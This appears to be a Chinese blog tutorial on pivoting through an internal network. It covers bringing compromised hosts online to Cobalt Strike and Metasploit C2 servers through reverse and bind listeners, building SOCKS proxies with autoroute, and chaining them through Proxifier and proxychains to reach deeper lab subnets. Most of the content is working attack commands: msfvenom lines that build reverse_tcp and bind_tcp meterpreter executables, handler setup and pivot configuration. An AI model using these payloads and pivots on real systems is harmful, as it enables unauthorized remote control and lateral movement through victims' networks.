内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

知识点

1、代理隧道篇-代理通讯网络不可达-正反向连接上线

2、代理隧道篇-代理通讯网络不可达-SockS代理配置

实现步骤

bash 复制代码
1、在被控机器上获取下一级网段
2、在被控及其上建立SockS节点
3、在工具上配置连接属性和规则触发

演示案例-代理技术-正反向监听/SockS配置-网络不可达-通讯解决/c2上线

bash 复制代码
解决:信息收集打点和漏洞利用部分
C2平台:MSF/CS/Sliver/Viper等


1、CS

192.168.139.x 网段反向上线




socks代理链接工具-Proxifier(windows)

bash 复制代码
注意:配置连接IP为C2服务器IP
C2服务器是一个远程服务器,‌用于管理和控制受感染的计算机或设备。‌C2服务器通常被用于网络攻击活动中,‌攻击者通过C2服务器发送命令,‌控制受感染的设备进行恶意行为




这里假设这个2.22的服务器存在漏洞能直接上线C2服务器,就会涉及一个C2正反向上线问题。

192.168.2.x 网段正向上线

bash 复制代码
反向监听器:reverse
正向监听器:bind(需主动连接)







192.168.3.x 网段正向上线






继续正向上线这个3.22服务器

192.168.4.x 网段正向上线

同理

2、MSF

192.168.139.x 网段反向上线

配置反向上线:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

查看路由表

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p

background 返回不结束会话

创建socks节点

bash 复制代码
use auxiliary/server/socks_proxy


socks代理链接工具-proxychains(linux)

加入修改配置:

bash 复制代码
/etc/proxychains4.conf


调用加载测试:

bash 复制代码
 proxychains4 curl http://192.168.2.22

192.168.2.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run



查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
/etc/proxychains4.conf


192.168.3.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run


查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
 /etc/proxychains4.conf


192.168.4.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run
相关推荐
程序猿编码2 天前
轻量高效的HTTP/HTTPS代理:SSL拦截与流量管控核心解析
http·https·ssl·代理
core5127 天前
Nginx 实战:如何通过代理转发下载中文文件并保留原文件名
运维·nginx·代理·下载·转发
托马斯-酷涛12 天前
加速GitHub加载速度-最终篇
github·proxy·代理
YoungHong199214 天前
解决开启代理后无法访问公司内网:自定义 DNS 规则置顶方案
代理·内网·公司
Arvin_Rong15 天前
摆脱多内网连接客户端冲突!基于 Hyper-V 虚机与 Proxifier 分流的多虚拟专用网连接解决方案
网络·claude·代理·proxifier
CAir216 天前
一问读懂并了解HTTP代理的基本原理
网络·网络协议·http·代理
xixixi7777723 天前
剖析Agent(代理)攻击面
网络·学习·安全·架构·网络攻击模型·代理
xixixi777771 个月前
“C2隐藏”——命令与控制服务器的隐藏技术
网络·学习·安全·代理·隐藏·合法服务·c2隐藏
Claudedy1 个月前
Linux 网络代理指南:解决下载慢、访问受限的开发痛点
linux·运维·网络·代理·proxy代理
人间打气筒(Ada)1 个月前
zerotier内网穿透部署(rockylinux部署本地服务器)超详细~~~
linux·内网穿透·内网·公网·zerotier·穿透